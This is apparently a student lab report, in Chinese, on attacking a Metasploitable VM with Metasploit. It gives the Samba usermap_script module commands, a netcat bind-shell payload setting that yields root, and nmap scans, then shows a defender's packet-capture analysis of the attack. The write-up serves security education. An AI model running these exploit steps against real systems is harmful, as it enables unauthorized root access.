一、實踐內(nèi)容
目前,Linux已經(jīng)成為服務(wù)器操作系統(tǒng)最流行的選擇,盡管Linux在安全設(shè)計上較Windows等一些操作系統(tǒng)具有一定的先天優(yōu)勢,但它也決不是早先一些人所認為的“絕對安全”。Linux操作系統(tǒng)也存在著大量的安全漏洞,由于它的開源特性,黑客們反而更容易從源碼中發(fā)現(xiàn)更多的Linux 系統(tǒng)內(nèi)核及開源軟件中的漏洞,系統(tǒng)管理員對Linux服務(wù)器的疏于管理也使得近年來針對Linux 系統(tǒng)的安全事件多有發(fā)生。
本次實踐針對Linux系統(tǒng)存在漏洞進行遠程滲透攻擊,使用的工具為Metasploit,此外在進行攻防對抗過程中,還使用到了Nmap、Neusse等信息搜集工具。
二、實踐過程
(一)使用Metasploit進行Linux遠程滲透攻擊
任務(wù):使用Metasploit滲透測試軟件,攻擊Linux靶機上的Samba服務(wù)Usermap_script安全漏洞,獲取目標(biāo)Linux靶機的主機訪問權(quán)限。實踐步驟如下:
①啟動Metasploit軟件,可根據(jù)個人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script滲透攻擊模塊;
③選擇攻擊PAYLOAD為遠程shell,(正向或反向連接均可);
④設(shè)置滲透攻擊參數(shù)(RHOST,LHOST,TARGET等);
⑤執(zhí)行滲透攻擊;
⑥查看是否正確得到遠程Shell,并查看獲得的權(quán)限。
本次實驗使用的攻擊機為Kali,IP地址為192.168.11.165;靶機為Metasploit Ubuntu,IP地址為192.168.11.149:
首先在Kali上打開Metasploit:
使用search samba
搜索關(guān)鍵詞samba尋找合適的滲透模塊,如圖所示,exploit/multi/samba/usermap_script
為我們所需要的模塊:
使用命令use exploit/multi/samba/usermap_script
加載滲透模塊:
使用show payloads
顯示攻擊載荷:
使用set payload cmd/unix/bind_netcat
設(shè)置攻擊載荷,然后顯示設(shè)置選項:
設(shè)置攻擊機IP和靶機IP,set RHOST 192.168.11.149
;set LHOST 192.168.11.165
,然后run
進行攻擊,攻擊成功后輸入ifconfig
命令查看IP地址,輸入whoami
查看當(dāng)前權(quán)限賬戶為root:
(二)實踐作業(yè):攻防對抗實踐
攻擊方:使用 Metasploit ,選擇 Metasploitable 靶機中發(fā)現(xiàn)的漏洞進行滲透攻擊,獲得遠程控制權(quán),并嘗試進一步獲得root權(quán)限。
防守方:使用 tcpdump/wireshark/snort 監(jiān)聽獲得網(wǎng)絡(luò)攻擊的數(shù)據(jù)包文件,結(jié)合 wireshark/snort 分析攻擊過程,獲得攻擊者的IP、目標(biāo)IP和端口、攻擊發(fā)起時間、攻擊利用漏洞、使用Shellcode、以及成功之后在命令行輸入的信息。
1、攻擊方
攻擊方 | 防守方 |
---|---|
Kali | Metasploit Ubuntu |
192.168.11.165 | 192.168.11.130 |
使用nmap -sV 192.168.11.130
掃描目標(biāo)主機的開放端口與版本號等信息:
使用nmap --script vuln 192.168.11.130
掃描目標(biāo)主機存在的漏洞:
可以看到存在的很多漏洞,比如下面這個CVE-2014-0224OpenSSL SSL MITM漏洞,攻擊者可借助特制的TLS握手利用該漏洞實施中間人攻擊,在OpenSSL-to-OpenSSL通信過程中使用零長度的主密鑰,劫持會話或獲取敏感消息:
攻擊采用的滲透模塊仍然是第一個實驗中使用的模塊,攻擊結(jié)果如圖所示:
2、防守方
攻擊方 | 防守方 |
---|---|
Kali | Metasploit Ubuntu |
192.168.11.126 | 192.168.11.149 |
第一次攻擊
攻擊時抓包結(jié)果如圖所示:
從中可以分析得到,攻擊者IP為192.168.11.126
,攻擊端口為139端口。
攻擊的時間大致為25號晚上8點半:
通過追蹤流可以看到使用的shellcode,可以判斷使用的漏洞為Samba服務(wù) usermap_script安全漏洞:
- nohup:就是no hangup,不要掛斷,忽略hup信號。標(biāo)準(zhǔn)輸出內(nèi)容會輸出到當(dāng)前目錄的nohup.out日志文件中而不終端顯示。
- 2&>1:linux中的文件號,1是標(biāo)準(zhǔn)輸出流,2是錯誤輸出流,此處&>的意思是合并 標(biāo)準(zhǔn)輸出和錯誤輸出并重定向。
攻擊者攻擊成功后,輸入了以下命令:
ls
whoami
cd etc
ls
mkdir zzx_so_easy
ls
第二次攻擊
攻擊方第二次攻擊捕獲的數(shù)據(jù)包如下:
從中可以分析得到,攻擊者IP為192.168.11.126
,攻擊端口為22端口(ssh服務(wù)),因此此次攻擊利用漏洞很可能是SSH相關(guān)漏洞。通過分析可以看到一直在有ssh數(shù)據(jù)包在進行連接登錄,因此推測本次攻擊為SSH弱口令爆破攻擊:
三、學(xué)習(xí)中遇到的問題及解決
- 問題1:針對usermap_script安全漏洞攻擊的shellcode不太理解
- 問題1解決方案:通過查閱博客才能大致理解
四、實踐總結(jié)
通過本次使用Metasploit進行Linux遠程滲透攻擊,首先進一步熟悉了Metasploit工具的使用,其次通過攻防對抗過程,動手進行了從漏洞信息搜集、漏洞利用、滲透攻擊到獲取目標(biāo)主機權(quán)限的過程,提高了自己的實踐能力。
本文摘自 :https://www.cnblogs.com/